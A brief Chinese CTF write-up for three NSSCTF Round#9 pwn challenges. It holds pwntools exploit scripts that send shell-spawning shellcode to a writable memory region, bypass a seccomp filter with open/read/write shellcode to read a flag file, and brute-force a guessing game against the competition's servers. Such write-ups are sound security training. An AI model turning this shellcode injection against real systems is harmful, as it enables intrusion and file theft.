NSSCTF Round#9 Basic. 部分wp

3/4,有一道运气好暴力脚本出来的,最后一题rust逆向...
myexec
mmap开辟了一块可写区间,read函数写入该区间
直接shellcode发送shellcraft.sh()就行了
exp:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

# io=process("./service")
io=remote("43.143.7.127",28003)

shellcode=asm(shellcraft.sh())
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()




mymem
函数主体和上一题一样,不过此题seccomp-tools dump出来发现限制了sys_number
不过可以构造open("")+read("")+write()的函数调用来绕过
exp:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

# io=process("./mymem")
io=remote("43.143.7.127",28391)
tp_addr=0x50000


shellcode=asm(shellcraft.open("/home/ctf/flag.txt"))+asm(shellcraft.read(3,tp_addr,50))+asm(shellcraft.write(1,tp_addr,50))
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()




oldfashion
非预期了

from pwn import *
context(log_level='debug',os='linux',arch='amd64')


# io=process("./zzzzz")
io=remote("43.142.108.3",28524)
while 1:
    io.sendline(b"2")
    if io.recv()==(b"Congratulations! You guessed the number correctly.\n"):
        break

io.interactive()